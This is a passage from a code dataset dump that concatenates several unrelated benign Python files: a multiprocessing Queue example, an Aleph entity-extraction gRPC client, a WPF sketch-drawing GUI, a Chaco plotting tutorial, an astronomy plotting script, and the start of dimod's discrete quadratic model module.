25, 2019\n15\n\nFor some reason, I couldn't find a general example of how to do this with Queue anywhere (even Python's doc examples don't spawn multiple processes), so here's what I got working after like 10 tries:\n\ndef add_helper(queue, arg1, arg2): # the func called in child processes\n ret = arg1 + arg2\n queue.put(ret)\n\ndef multi_add(): # spawns child processes\n q = Queue()\n processes = []\n rets = []\n for _ in range(0, 100):\n p = Process(target=add_helper, args=(q, 1, 2))\n processes.append(p)\n p.start()\n for p in processes:\n ret = q.get() # will block\n rets.append(ret)\n for p in processes:\n p.join()\n return rets\n\nQueue is a blocking, thread-safe queue that you can use to store the return values from the child processes. So you have to pass the queue to each process. 
Something less obvious here is that you have to get() from the queue before you join the Processes or else the queue fills up and blocks everything.\n@author: kyang\n'''\n\nimport multiprocessing\nfrom time import sleep\n\ndef worker(queue,i):\n \"\"\"worker function\"\"\"\n print('Worker '+str(i))\n sleep(6-i)\n queue.put('Worker '+str(i))\n\nif __name__ == '__main__':\n # a plain Queue is used here; JoinableQueue.join() would deadlock because no consumer ever calls task_done()\n q = multiprocessing.Queue()\n procs = []\n outs = []\n for i in range(5):\n p = multiprocessing.Process(target=worker,args=(q,i,))\n procs.append(p)\n p.start()\n # drain the queue BEFORE joining the processes, as the docstring above advises\n for _ in range(5):\n outs.append(q.get()) # blocks until a result is available\n for p in procs:\n p.join()\n print(str(outs))","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"116355216","text":"import grpc\nimport time\nimport logging\n\nfrom aleph import settings\nfrom aleph.analyze.analyzer import EntityAnalyzer\nfrom aleph.model import DocumentTag\nfrom alephclient.services.entityextract_pb2_grpc import EntityExtractStub\nfrom alephclient.services.entityextract_pb2 import ExtractedEntity, Text\n\nlog = logging.getLogger(__name__)\nTYPE = ExtractedEntity.Type.Value\n\n\nclass EntityExtractor(EntityAnalyzer):\n MIN_LENGTH = 100\n TYPES = {\n TYPE('PERSON'): DocumentTag.TYPE_PERSON,\n TYPE('ORGANIZATION'): DocumentTag.TYPE_ORGANIZATION,\n TYPE('COMPANY'): DocumentTag.TYPE_ORGANIZATION,\n }\n\n def __init__(self):\n self.active = self.SERVICE is not None\n\n def get_service(self):\n cls = type(self)\n if not hasattr(cls, '_channel') or cls._channel is None:\n # cache the channel on the class so reset() can clear it\n cls._channel = grpc.insecure_channel(self.SERVICE)\n return EntityExtractStub(cls._channel)\n\n def reset(self):\n cls = type(self)\n cls._channel = None\n\n def extract(self, collector, document):\n languages = list(document.languages)\n if not len(languages):\n languages = [settings.DEFAULT_LANGUAGE]\n\n for text in document.texts:\n if len(text) <= self.MIN_LENGTH:\n continue\n text = Text(text=text, languages=languages)\n try:\n service = self.get_service()\n for entity in service.Extract(text):\n type_ = self.TYPES.get(entity.type)\n if type_ is None:\n continue\n collector.emit(entity.label, type_)\n except Exception:\n log.exception('RPC call failed')\n self.reset()\n time.sleep(1)\n\n if len(collector):\n log.info('%s Extracted %s entities.', self.SERVICE, len(collector))\n\n\nclass PolyglotEntityExtractor(EntityExtractor):\n ORIGIN = 'polyglot'\n SERVICE = settings.POLYGLOT_SERVICE\n\n\nclass SpacyEntityExtractor(EntityExtractor):\n ORIGIN = 'spacy'\n SERVICE = settings.SPACY_SERVICE\n","sub_path":"aleph/analyze/extract_entity.py","file_name":"extract_entity.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"423252617","text":"import clr\r\nimport sys\r\nimport os\r\nimport threading\r\nimport Queue\r\n\r\nclr.AddReference('PresentationCore')\r\nclr.AddReference('PresentationFramework')\r\nclr.AddReference('Microsoft.Scripting')\r\nclr.AddReference('Microsoft.Dynamic')\r\nclr.AddReference('Microsoft.Ink')\r\n#clr.AddReference('Microsoft.Win32')\r\nclr.AddReference('System.Drawing')\r\nclr.LoadAssemblyFromFile('WPFFrameworkElementExtension.dll')\r\n\r\nclr.AddReference('WPFFrameworkElementExtension')\r\n\r\n\r\nfrom System.Windows.Markup import XamlReader\r\nfrom System.Windows import Application, FlowDirection\r\nfrom System.IO import FileStream, FileMode\r\nfrom System.Windows.Controls import InkCanvas, TextBlock, 
UIElementCollection, InkCanvasEditingMode\r\nfrom System.Windows.Media import Brushes, SolidColorBrush, Color, FormattedText, Typeface\r\nfrom System.Windows.Shapes import Ellipse, Line\r\nfrom System.Windows.Input import StylusPoint, StylusPointCollection\r\nfrom System.Windows.Ink import Stroke as MSStroke, StylusTip\r\nfrom System.Globalization import CultureInfo\r\nfrom Microsoft.Win32 import OpenFileDialog\r\n\r\n\r\n\r\nfrom Utils import GeomUtils #Import GeomUtils first. Just do it. Lest Point won't load when being loaded through Board. Still can't figure out root cause, guessing something with Circular dependencies?\r\nfrom Utils import Logger\r\n\r\nfrom SketchSystem import initialize\r\nfrom SketchFramework.Stroke import Stroke\r\nfrom SketchFramework.Point import Point\r\nfrom SketchFramework.Board import BoardSingleton\r\nfrom MSRecognizers import MSAxesObserver\r\nimport SketchGUI\r\nfrom SketchGUI import _SketchGUI\r\nfrom SketchGUI import SketchGUISingleton\r\n\r\n########################################\r\n#Some globals for sanity, set in initialization code\r\n#print SketchGUI.globals()\r\nlogger = Logger.getLogger('WPFSketchGUI', Logger.WARN )\r\n\r\n\r\ndef recordEvent(event, filename=\"playback.txt\"):\r\n mode = \"a\"\r\n fp = open(filename, mode)\r\n print >> fp, \"#%s\" % (event)\r\n fp.close()\r\n\r\ndef recordStroke(stroke, id, filename = \"playback.txt\"):\r\n saveStrokes([stroke], filename=filename, overwrite=False, id=id)\r\n\r\ndef recordStrokeErase( id, filename = \"playback.txt\"):\r\n mode = \"a\"\r\n fp = open(filename, mode)\r\n print >> fp, \"#Remove %s\" % (id)\r\n fp.close()\r\n\r\n\r\n \r\nclass _WpfSketchGUI(_SketchGUI):\r\n #HEIGHT = _SketchGUI.HEIGHT\r\n Singleton = None\r\n StrokeCount = 0\r\n def __init__(self, wpfCanvas, backCanvas = None):\r\n \r\n \r\n self.Board = BoardSingleton(reset = True)\r\n initialize(self.Board)\r\n self.Canvas = wpfCanvas\r\n self.BackCanvas = backCanvas\r\n self.StrokeMap = {}\r\n self.StrokeOrderList = []\r\n self.StrokeIDMap = {}\r\n self.RestoreStrokes = loadStrokes(filename=\"Restorefile.txt\")\r\n self._inking = True\r\n self._lineStrokes = {}\r\n self._removeStrokes = []\r\n\r\n\r\n try:\r\n os.remove(\"Restorefile.txt\")\r\n except:\r\n pass\r\n try:\r\n os.remove(\"playback.txt\")\r\n except:\r\n pass\r\n self.Singleton = self\r\n _WpfSketchGUI.Singleton = self\r\n _SketchGUI.Singleton = self\r\n \r\n \r\n def InkCanvas_StrokeCollected( self, sender, e ): #e is a InkCanvasStrokeCollectedEventArgs \r\n pointList = []\r\n #Transform the Canvas's Points into our Points\r\n for stylusPoint in e.Stroke.StylusPoints:\r\n px, py = transformBoard_Wpf(stylusPoint.X, stylusPoint.Y, _WpfSketchGUI.HEIGHT)\r\n pointList.append( Point( px, py ) ) \r\n newStroke = Stroke( pointList )\r\n self.StrokeMap[e.Stroke] = newStroke\r\n self.StrokeOrderList.append(newStroke)\r\n \r\n #try:\r\n self.Board.AddStroke( newStroke )\r\n strokeId = _WpfSketchGUI.StrokeCount\r\n _WpfSketchGUI.StrokeCount += 1\r\n\r\n self.StrokeIDMap[newStroke] = strokeId\r\n recordStroke(newStroke, strokeId) \r\n #except Exception as exc:\r\n # logger.error(\"**********ADD STROKE ERROR ********\\n %s\" % (exc))\r\n self.Redraw()\r\n #SketchGUISingleton().drawText(100,100, InText=rec_text(self.StrokeOrderList))\r\n saveStrokes(self.Board.Strokes, filename=\"Restorefile.txt\", overwrite = True)\r\n\r\n def InkCanvas_StrokeErasing(self, sender, e):\r\n self._removeStrokes.append(e.Stroke)\r\n \"\"\"\r\n board_stroke = self.StrokeMap.pop(e.Stroke, None)\r\n if 
board_stroke is not None: #Stroke is user-drawn\r\n strokeID = self.StrokeIDMap.get(board_stroke, \"\")\r\n recordStrokeErase(strokeID)\r\n #self.StrokeOrderList.remove(board_stroke)\r\n self.Board.RemoveStroke(board_stroke)\r\n self.Redraw()\r\n \"\"\"\r\n def InkCanvas_MouseLeftButtonUp(self, sender, e):\r\n if self.Canvas.EditingMode == InkCanvasEditingMode.EraseByStroke:\r\n self.Canvas.EditingMode = InkCanvasEditingMode.Ink\r\n self.Canvas.Background = SolidColorBrush( color_from_hex(\"#FFFFFF\"))\r\n for removedStroke in self._removeStrokes:\r\n board_stroke = self.StrokeMap.pop(removedStroke, None)\r\n if board_stroke is not None: #Stroke is user-drawn\r\n strokeID = self.StrokeIDMap.get(board_stroke, \"\")\r\n recordStrokeErase(strokeID)\r\n #self.StrokeOrderList.remove(board_stroke)\r\n self.Board.RemoveStroke(board_stroke)\r\n self._removeStrokes = []\r\n self.Redraw()\r\n\r\n def SaveStrokesClicked(self, sender, e):\r\n recordEvent(\"SaveStrokes\")\r\n saveStrokes(self.Board.Strokes, overwrite = True)\r\n \r\n def ChooseFileClicked(self, sender, e):\r\n fd = OpenFileDialog()\r\n fd.Filter = \"Comma Separated Value|*.csv|All Files|*.*\"\r\n if (fd.ShowDialog()):\r\n MSAxesObserver.SETDATAFILE(fd.FileName)\r\n print( \"Open file %s\" % (fd.FileName) )\r\n recordEvent(\"Open %s\" % (fd.FileName))\r\n\r\n self.ResetBoard()\r\n def LoadStrokesClicked(self, sender, e):\r\n for stroke in loadStrokes():\r\n #self.StrokeMap[stroke] = None\r\n self.StrokeOrderList.append(stroke)\r\n self.Board.AddStroke( stroke )\r\n saveStrokes([stroke], filename=\"Restorefile.txt\", overwrite = False)\r\n recordEvent(\"LoadStrokes\")\r\n\r\n self.Redraw()\r\n \r\n def RestoreClicked(self, sender, e):\r\n for stroke in self.RestoreStrokes:\r\n self.StrokeOrderList.append(stroke)\r\n self.Board.AddStroke( stroke )\r\n recordEvent(\"Restored\")\r\n self.Redraw()\r\n \r\n def ResetBoard(self, *args, **kargs):\r\n recordEvent(\"ResetBoard\")\r\n \r\n self.Clear()\r\n self.Board.Reset()\r\n self.StrokeOrderList = []\r\n initialize(self.Board)\r\n \r\n def Clear(self, *args, **kargs):\r\n self._lineStrokes = {}\r\n self.StrokeMap = {}\r\n for elem in list(self.BackCanvas.Children):\r\n if elem is not self.Canvas:\r\n self.BackCanvas.Children.Remove(elem)\r\n for stk in list(self.Canvas.Strokes):\r\n self.Canvas.Strokes.Remove(stk)\r\n \r\n def ToggleCursorEraser(self, sender, e):\r\n if self.Canvas.EditingMode == InkCanvasEditingMode.EraseByStroke:\r\n self.Canvas.EditingMode = InkCanvasEditingMode.Ink\r\n self.Canvas.Background = SolidColorBrush( color_from_hex(\"#FFFFFF\"))\r\n else:\r\n self.Canvas.EditingMode = InkCanvasEditingMode.EraseByStroke\r\n self.Canvas.Background = SolidColorBrush( color_from_hex(\"#F8ACAC\"))\r\n \r\n\r\n \r\n def Redraw(self):\r\n \"Find all the strokes on the board, draw them, then iterate through every object and have it draw itself\"\r\n global HEIGHT, WIDTH\r\n self.Clear()\r\n \r\n \r\n strokes = self.Board.Strokes\r\n observers = self.Board.BoardObservers\r\n \r\n #try:\r\n for obs in observers:\r\n obs.drawMyself()\r\n \r\n for s in strokes:\r\n s.drawMyself()\r\n #except Exception as exc:\r\n # logger.error(\"************ REDRAW ERROR **************\\n%s\" % (exc) )\r\n \r\n \r\n \r\n def drawCircle(self, x, y, radius=1, color=\"#000000\", fill=\"\", width=1.0):\r\n \"Draw a circle on the canvas at (x,y) with radius rad. Color should be 24 bit RGB string #RRGGBB. 
Empty string is transparent\"\r\n #x,y = transformBoard_Wpf(x,y,height = HEIGHT)\r\n el = Ellipse()\r\n el.Width = radius * 2\r\n el.Height = radius * 2\r\n el.Stroke = SolidColorBrush(color_from_hex(color))\r\n el.StrokeThickness = width\r\n el.IsHitTestVisible = False\r\n self.BackCanvas.SetBottom(el, y - radius)\r\n self.BackCanvas.SetLeft(el, x - radius)\r\n# el.SetValue(InkCanvas.LeftProperty, x - radius)\r\n# el.SetValue(InkCanvas.TopProperty, y - radius)\r\n\r\n self.BackCanvas.Children.Add(el)\r\n\r\n def drawLine(self, x1, y1, x2, y2, width=2, color=\"#000000\"):\r\n \"Draw a line on the canvas from (x1,y1) to (x2,y2). Color should be 24 bit RGB string #RRGGBB\"\r\n global HEIGHT\r\n x1, y1 = transformBoard_Wpf(x1, y1, height = _WpfSketchGUI.HEIGHT)\r\n x2, y2 = transformBoard_Wpf(x2, y2, height = _WpfSketchGUI.HEIGHT)\r\n\r\n line = Line()\r\n line.Stroke = SolidColorBrush(color_from_hex(color))\r\n line.StrokeThickness = width\r\n line.IsHitTestVisible = False\r\n line.X1 = x1\r\n line.X2 = x2\r\n line.Y1 = y1\r\n line.Y2 = y2\r\n self.BackCanvas.Children.Add(line)\r\n\r\n #self.Canvas.Background = Brushes.LightGreen\r\n \r\n def drawText (self, x, y, InText=\"\", size=10, color=\"#000000\"):\r\n \"Draw some text (InText) on the canvas at (x,y). Color as defined by 24 bit RGB string #RRGGBB\"\r\n #x,y = transformBoard_Wpf(x,y,height = HEIGHT)\r\n text = TextBlock()\r\n text.Text = InText\r\n text.FontSize = size\r\n text.Foreground = SolidColorBrush(color_from_hex(color))\r\n text.IsHitTestVisible = False\r\n \r\n \r\n self.BackCanvas.SetBottom(text, y)\r\n self.BackCanvas.SetLeft(text, x)\r\n self.BackCanvas.Children.Add(text)\r\n \r\n def drawStroke(self, stroke, width = 2, color = \"#000000\", erasable = False):\r\n if erasable:\r\n spc = StylusPointCollection()\r\n for point in stroke.Points:\r\n x, y = transformBoard_Wpf(point.X, point.Y, height = _WpfSketchGUI.HEIGHT)\r\n s_point = StylusPoint(x, y)\r\n spc.Add(s_point)\r\n ms_stroke = MSStroke(spc)\r\n if stroke in self.Board.Strokes:\r\n self.StrokeMap[ms_stroke] = stroke\r\n \r\n ms_stroke.DrawingAttributes.Color = color_from_hex(color)\r\n ms_stroke.DrawingAttributes.Width = width\r\n ms_stroke.DrawingAttributes.StylusTip = StylusTip.Ellipse\r\n ms_stroke.DrawingAttributes.IgnorePressure = True\r\n\r\n self.Canvas.Strokes.Add(ms_stroke)\r\n else:\r\n _SketchGUI.drawStroke(self, stroke, width = width, color = color, erasable = erasable)\r\n \r\n def drawBox(self, topleft, bottomright, topright = None, bottomleft = None, color=\"#000000\", width=2):\r\n os = width / 2# Offset to connect the point tips\r\n if topright is None:\r\n topright = Point(bottomright.X, topleft.Y)\r\n if bottomleft is None:\r\n bottomleft = Point(topleft.X, bottomright.Y)\r\n self.drawLine(topleft.X + os, topleft.Y - os, topright.X - os, topright.Y - os, color=color, width=width)\r\n self.drawLine(topright.X - os, topright.Y, bottomright.X - os, bottomright.Y, color=color, width=width)\r\n self.drawLine(bottomright.X - os, bottomright.Y + os, bottomleft.X + os, bottomleft.Y + os, color=color, width=width)\r\n self.drawLine(bottomleft.X + os, bottomleft.Y, topleft.X + os, topleft.Y, color=color, width=width)\r\n \r\n \"\"\"\r\n self.drawLine(topleft.X + 0, topleft.Y - 0, topright.X - 0, topright.Y - 0, color=\"#000000\", width=1)\r\n self.drawLine(topright.X - 0, topright.Y - 0, bottomright.X - 0, bottomright.Y + 0, color=\"#000000\", width=1)\r\n self.drawLine(bottomright.X - 0, bottomright.Y + 0, bottomleft.X + 0, bottomleft.Y + 0, 
color=\"#000000\", width=1)\r\n self.drawLine(bottomleft.X + 0, bottomleft.Y + 0, topleft.X + 0, topleft.Y - 0, color=\"#000000\", width=1)\r\n \"\"\"\r\n\r\n \r\ndef WpfSketchGUISingleton():\r\n if _WpfSketchGUI.Singleton == None:\r\n print (\"Creating new singleton\")\r\n LoadApp()\r\n \r\n print(\"Singleton value %s\" % (_WpfSketchGUI.Singleton))\r\n return _WpfSketchGUI.Singleton\r\n\r\n\r\n\r\n########################################\r\n\r\ndef color_from_hex(color_string):\r\n \"Convert a color string to a triple of bytes, (r,g,b)\"\r\n if type(color_string) is str:\r\n clist = []\r\n color_string = color_string[1:]\r\n \r\n for i in range(3):\r\n hexstr = color_string[2*i: 2*i + 2]\r\n clist.append(int('0x'+hexstr, 16))\r\n return Color.FromArgb(0xFF, clist[0], clist[1], clist[2])\r\n else:\r\n return None\r\n\r\ndef transformBoard_Wpf(x, y, height = None):\r\n return x, height - y\r\n\r\ndef loadStrokes(filename = \"saved_strokes.txt\"):\r\n \"Returns a list of strokes saved to filename\"\r\n strokelist = []\r\n current_stroke = None\r\n try:\r\n fp = open(filename, \"r\")\r\n for line in fp.readlines():\r\n if line.startswith(\"#Stroke\"):\r\n current_stroke = Stroke()\r\n elif line.startswith(\"#ENDStroke\"):\r\n if type(current_stroke) is Stroke:\r\n strokelist.append(current_stroke)\r\n current_stroke = None\r\n else:\r\n fields = line.split()\r\n if len(fields) == 3 and type(current_stroke) is Stroke:\r\n x = float(fields[0])\r\n y = float(fields[1])\r\n t = float(fields[2])\r\n current_stroke.addPoint(Point(x,y,t))\r\n fp.close()\r\n except:\r\n pass\r\n logger.debug(\"Loaded %s strokes\" % (len(strokelist) ) )\r\n return strokelist\r\n \r\n \r\ndef saveStrokes(strokes, filename = \"saved_strokes.txt\", overwrite = True, id = \"\"):\r\n \"Saves a single stroke to filename\"\r\n if overwrite:\r\n mode = \"w\"\r\n else:\r\n mode = \"a\"\r\n fp = open(filename, mode)\r\n for stk in strokes:\r\n print >> fp, \"#Stroke %s\" % (id)\r\n for point in stk.Points:\r\n print >> fp, point.X, point.Y, point.T\r\n print >> fp, \"#ENDStroke\"\r\n fp.close()\r\n\r\n\r\n\r\ndef LoadApp():\r\n global HEIGHT, WIDTH\r\n app = Application()\r\n\r\n #Load the XAML.\r\n xamlWindow = XamlReader.Load(FileStream('SketchFramework\\SketchCade.xaml', FileMode.Open))\t#Window object as the root.\r\n\r\n #wsg = _WpfSketchGUI( xamlWindow.InkCanvas )\r\n #_WpfSketchGUI.Singleton = wsg\r\n \r\n _WpfSketchGUI.Singleton = _WpfSketchGUI( xamlWindow.InkCanvas, xamlWindow.BackCanvas )\r\n \r\n\r\n #Bind the Event Handler\r\n xamlWindow.InkCanvas.StrokeCollected += _WpfSketchGUI.Singleton.InkCanvas_StrokeCollected\r\n xamlWindow.InkCanvas.StrokeErasing += _WpfSketchGUI.Singleton.InkCanvas_StrokeErasing\r\n xamlWindow.InkCanvas.MouseLeftButtonUp += _WpfSketchGUI.Singleton.InkCanvas_MouseLeftButtonUp\r\n #xamlWindow.InkCanvas.MouseUp += _WpfSketchGUI.Singleton.Canvas_MouseUp\r\n #xamlWindow.InkCanvas.MouseDown += _WpfSketchGUI.Singleton.Canvas_MouseDown\r\n xamlWindow.ClearButton.Click += _WpfSketchGUI.Singleton.ResetBoard\r\n xamlWindow.EraserButton.Click += _WpfSketchGUI.Singleton.ToggleCursorEraser\r\n xamlWindow.SaveButton.Click += _WpfSketchGUI.Singleton.SaveStrokesClicked\r\n xamlWindow.LoadButton.Click += _WpfSketchGUI.Singleton.LoadStrokesClicked\r\n xamlWindow.RestoreButton.Click += _WpfSketchGUI.Singleton.RestoreClicked\r\n xamlWindow.ChooseFileButton.Click += _WpfSketchGUI.Singleton.ChooseFileClicked\r\n xamlWindow.InkCanvas.MouseRightButtonUp += _WpfSketchGUI.Singleton.ToggleCursorEraser\r\n 
app.Run(xamlWindow)\r\n\r\n########################################\r\n\r\nif __name__ == \"__main__\":\r\n\r\n \r\n LoadApp()\r\n ","sub_path":"windows/SketchCade/SketchFramework/WpfSketchGUI.py","file_name":"WpfSketchGUI.py","file_ext":"py","file_size_in_byte":16330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"522946371","text":"#!/usr/bin/env python\n#\n#\n# Tutorial 9b. Synchronize the Y data space as well, and add some tools.\n\n\nfrom tutorial8 import PlotFrame\nfrom enthought.chaco.tools.api import ZoomTool\n\nclass PlotFrame2(PlotFrame):\n def _create_plot(self):\n container = super(PlotFrame2, self)._create_plot()\n\n self.right_plot.index_mapper.range = self.left_plot.index_mapper.range\n self.right_plot.value_mapper.range = self.left_plot.value_mapper.range\n\n self.left_plot.overlays.append(ZoomTool(self.left_plot,\n tool_mode=\"box\", always_on=False))\n self.right_plot.overlays.append(ZoomTool(self.right_plot,\n tool_mode=\"box\", always_on=False))\n\n return container\n\nif __name__ == \"__main__\":\n import wx\n app = wx.PySimpleApp()\n frame = PlotFrame2(None)\n app.MainLoop()\n","sub_path":"examples/tutorials/tutorial9b.py","file_name":"tutorial9b.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"428029023","text":"###############################################################################\n# plot_maphz.py: plot h_Z in the feh,afe plane for MAPs\n###############################################################################\nimport sys\nimport pickle\nimport numpy\nimport matplotlib\nmatplotlib.use('Agg')\nfrom galpy.util import bovy_plot\nfrom matplotlib import pyplot, cm\nimport define_rcsample\ndef plot_maphz(plotname):\n # Load the three fits\n with open('../mapfits/tribrokenexpflare.sav','rb') as savefile:\n bf= numpy.array(pickle.load(savefile))\n samples= numpy.array(pickle.load(savefile))\n with open('../mapfits/tribrokenexp.sav','rb') as savefile:\n bfnf= numpy.array(pickle.load(savefile))\n samplesnf= numpy.array(pickle.load(savefile))\n with open('../mapfits/tribrokenexpfixedflare.sav','rb') as savefile:\n bfff= numpy.array(pickle.load(savefile))\n samplesff= numpy.array(pickle.load(savefile))\n maps= define_rcsample.MAPs()\n plotthisz= numpy.zeros(len(bf))+numpy.nan\n plotthisze= numpy.zeros(len(bf))+numpy.nan\n for ii, map in enumerate(maps.map()):\n # ~numpy.isnan(...) selects the finite entries; boolean subtraction (True-...) is an error on modern NumPy\n if numpy.median(numpy.exp(samples[ii,3])[~numpy.isnan(numpy.exp(samples[ii,3]))]) < 5.:\n tmed= numpy.median((1./samplesnf[ii,1])[~numpy.isnan(1./samplesnf[ii,1])])\n terr= numpy.std((1./samplesnf[ii,1])[~numpy.isnan(1./samplesnf[ii,1])])\n else:\n tmed= numpy.median((1./samplesff[ii,1])[~numpy.isnan(1./samplesff[ii,1])])\n terr= numpy.std((1./samplesff[ii,1])[~numpy.isnan(1./samplesff[ii,1])])\n plotthisz[ii]= tmed\n plotthisze[ii]= terr\n plotthisz[plotthisze/plotthisz > 0.2]= numpy.nan\n bovy_plot.bovy_print()\n maps.plot(plotthisz*1000.,\n vmin=200.,vmax=1000.,\n minnstar=15,\n zlabel=r'$h_Z\\,(\\mathrm{pc})$',\n shrink=0.655)\n # Sequences\n haloc= define_rcsample.highalphalocus()\n bovy_plot.bovy_plot(haloc[:,0],haloc[:,1],'-',color='0.75',\n lw=2.5,overplot=True)\n haloc= define_rcsample.lowalphalocus()\n haloc= haloc[(haloc[:,0] > -0.55)*(haloc[:,0] < 0.225)]\n bovy_plot.bovy_plot(haloc[:,0],haloc[:,1],'-',color='0.75',\n lw=2.5,overplot=True)\n # Label\n #t= pyplot.text(-0.51,0.235,r'$\\mathrm{single}$',\n # 
size=16.,color='w')\n #t.set_bbox(dict(alpha=0.5,color=cm.coolwarm(0.),\n # edgecolor='none'))\n #t= pyplot.text(-0.475,0.195,r'$\\mathrm{exponential}$',\n # size=16.,color='w')\n #t.set_bbox(dict(alpha=0.5,color=cm.coolwarm(0.),\n # edgecolor='none'))\n pyplot.tight_layout()\n bovy_plot.bovy_end_print(plotname,dpi=300)\n return None\n\nif __name__ == '__main__':\n plot_maphz(sys.argv[1])\n","sub_path":"py/plot_maphz.py","file_name":"plot_maphz.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"454167727","text":"# Copyright 2020 D-Wave Systems Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport collections.abc as abc\nimport io\nimport json\nimport tempfile\nimport warnings\n\nfrom collections import namedtuple\nfrom operator import eq\n\nimport numpy as np\n\nfrom dimod.discrete.cydiscrete_quadratic_model import cyDiscreteQuadraticModel\nfrom dimod.sampleset import as_samples\nfrom dimod.serialization.fileview import VariablesSection, _BytesIO\nfrom dimod.utilities import iter_safe_relabels\n\n\n__all__ = ['DiscreteQuadraticModel', 'DQM']\n\n\n# constants for serialization\nDQM_MAGIC_PREFIX = b'DIMODDQM'\nDATA_MAGIC_PREFIX = b'BIAS'\nVERSION = bytes([1, 0]) # version 1.0\n\n\n# todo: update BinaryQuadraticModel.to_numpy_vectors to also use namedtuple\nDQMVectors = namedtuple(\n 'DQMVectors', ['case_starts', 'linear_biases', 'quadratic', 'labels'])\nQuadraticVectors = namedtuple(\n 'QuadraticVectors', ['row_indices', 'col_indices', 'biases'])\n\n\n# we want to use SpooledTemporaryFile but have it also include the methods\n# from io.IOBase. This is (probably) forthcoming in future python, see\n# https://bugs.python.org/issue35112\nif issubclass(tempfile.SpooledTemporaryFile, io.IOBase):\n warnings.warn(\"Using deprecated SpooledTemporaryFile wrapper, \"\n \"functionality is now included in SpooledTemporaryFile\",\n DeprecationWarning)\n\n\nclass _SpooledTemporaryFile(tempfile.SpooledTemporaryFile):\n\n # This is not part of io.IOBase, but it is implemented in io.BytesIO\n # and io.TextIOWrapper\n def readinto(self, *args, **kwargs):\n return self._file.readinto(*args, **kwargs)\n\n def readable(self):\n return self._file.readable()\n\n def seekable(self):\n return self._file.seekable()\n\n def writable(self):\n return self._file.writable()\n\n\n# this is the third(!) variables implementation in dimod. It differs from\n# dimod.variables in that it stores its labels sparsely. It has the same\n# behaviour as the cyBQM ones, except that it rolls the logic up into a\n# object. 
These need to be unified.\nclass _Variables(abc.Sequence, abc.Set):\n def __init__(self):\n self._label_to_idx = dict()\n self._idx_to_label = dict()\n self.stop = 0\n\n def __contains__(self, v):\n return v in self._label_to_idx or (isinstance(v, int)\n and 0 <= v < self.stop\n and v not in self._idx_to_label)\n\n def __eq__(self, other):\n if isinstance(other, abc.Sequence):\n return len(self) == len(other) and all(map(eq, self, other))\n elif isinstance(other, abc.Set):\n return not (self ^ other)\n else:\n return False\n\n def __getitem__(self, idx):\n\n if not isinstance(idx, int):\n raise TypeError(\"index must be an integer.\")\n\n given = idx # for error message\n\n # handle negative indexing\n if idx < 0:\n idx = self.stop + idx\n\n if idx >= self.stop:\n raise IndexError('index {} out of range'.format(given))\n\n return self._idx_to_label.get(idx, idx)\n\n def __len__(self):\n return self.stop\n\n def __ne__(self, other):\n return not (self == other)\n\n @property\n def is_range(self):\n return not self._label_to_idx\n\n def _append(self, v=None):\n \"\"\"Append a new variable.\"\"\"\n\n if v is None:\n # handle the easy case\n if self.is_range:\n self.stop += 1\n return\n\n # we need to pick a new label\n v = self.stop\n\n if v not in self:\n # it's free, so we can stop\n self.stop += 1\n return\n\n # there must be a free integer available\n v = 0\n while v in self:\n v += 1\n\n elif v in self:\n raise ValueError('{!r} is already a variable'.format(v))\n\n idx = self.stop\n\n if idx != v:\n self._label_to_idx[v] = idx\n self._idx_to_label[idx] = v\n\n self.stop += 1\n\n return\n\n def index(self, v):\n # todo: support start and end like list.index\n if v not in self:\n raise ValueError('unknown variable {!r}'.format(v))\n return self._label_to_idx.get(v, v)\n\n def _relabel(self, mapping):\n for submap in iter_safe_relabels(mapping, self):\n for old, new in submap.items():\n if old == new:\n continue\n\n idx = self._label_to_idx.pop(old, old)\n\n if new != idx:\n self._label_to_idx[new] = idx\n self._idx_to_label[idx] = new # overwrites old idx\n else:\n self._idx_to_label.pop(idx, None)\n\n def _relabel_as_integers(self):\n mapping = self._idx_to_label.copy()\n self._idx_to_label.clear()\n self._label_to_idx.clear()\n return mapping\n\n\nclass DiscreteQuadraticModel:\n \"\"\"Encodes a discrete quadratic model.\n\n A discrete quadratic model is a polynomial over discrete variables with\n terms all of degree two or less.\n\n Examples:\n\n This example constructs a map coloring with Canadian provinces. To\n solve the problem we penalize adjacent provinces having the same color.\n\n >>> provinces = [\"AB\", \"BC\", \"ON\", \"MB\", \"NB\", \"NL\", \"NS\", \"NT\", \"NU\",\n ... \"PE\", \"QC\", \"SK\", \"YT\"]\n >>> borders = [(\"BC\", \"AB\"), (\"BC\", \"NT\"), (\"BC\", \"YT\"), (\"AB\", \"SK\"),\n ... (\"AB\", \"NT\"), (\"SK\", \"MB\"), (\"SK\", \"NT\"), (\"MB\", \"ON\"),\n ... (\"MB\", \"NU\"), (\"ON\", \"QC\"), (\"QC\", \"NB\"), (\"QC\", \"NL\"),\n ... (\"NB\", \"NS\"), (\"YT\", \"NT\"), (\"NT\", \"NU\")]\n >>> colors = [0, 1, 2, 3]\n ...\n >>> dqm = dimod.DiscreteQuadraticModel()\n >>> for p in provinces:\n ... _ = dqm.add_variable(4, label=p)\n >>> for p0, p1 in borders:\n ... 
